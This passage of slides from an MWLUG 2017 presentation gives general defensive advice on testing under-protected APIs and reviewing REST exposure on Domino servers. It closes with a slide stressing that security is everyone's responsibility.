  • 42. MWLUG 2017 Moving Collaboration Forward A10 – Under-protected APIs Am I Vulnerable to Attack? Testing your APIs for vulnerabilities should be similar to testing the rest of your application for vulnerabilities. All the different types of injection, authentication, access control, encryption, configuration, and other issues can exist in APIs just as in a traditional application. However, because APIs are designed for use by programs (not humans) they frequently lack a UI and also use complex protocols and complex data structures. These factors can make security testing difficult. The use of widely-used formats can help, such as Swagger (OpenAPI), REST, JSON, and XML. Some frameworks like GWT and some RPC implementations use custom formats. Some applications and APIs create their own protocol and data formats, like WebSockets. The breadth and complexity of APIs make it difficult to automate effective security testing, possibly leading to a false sense of security. Ultimately, knowing if your APIs are secure means carefully choosing a strategy to test all defenses that matter. HG
  • 43. MWLUG 2017 Moving Collaboration Forward Domino Vulnerabilities – A10 • Know what is turned on in your applications and server. – Is Domino DAS turned on? • REST access to a database – XPages REST, agents that serve up REST data, etc. • Do a Code review, understand what data these might serve up and how much access is given. HG
  • 44. MWLUG 2017 Moving Collaboration Forward Closing • Security is the responsibility of EVERYONE • Especially those of us in IT, even without a security job – Developers have to ALWAYS design for security – Admins have to ALWAYS plan and monitor to build resilient systems – Management has to provide the resources and focus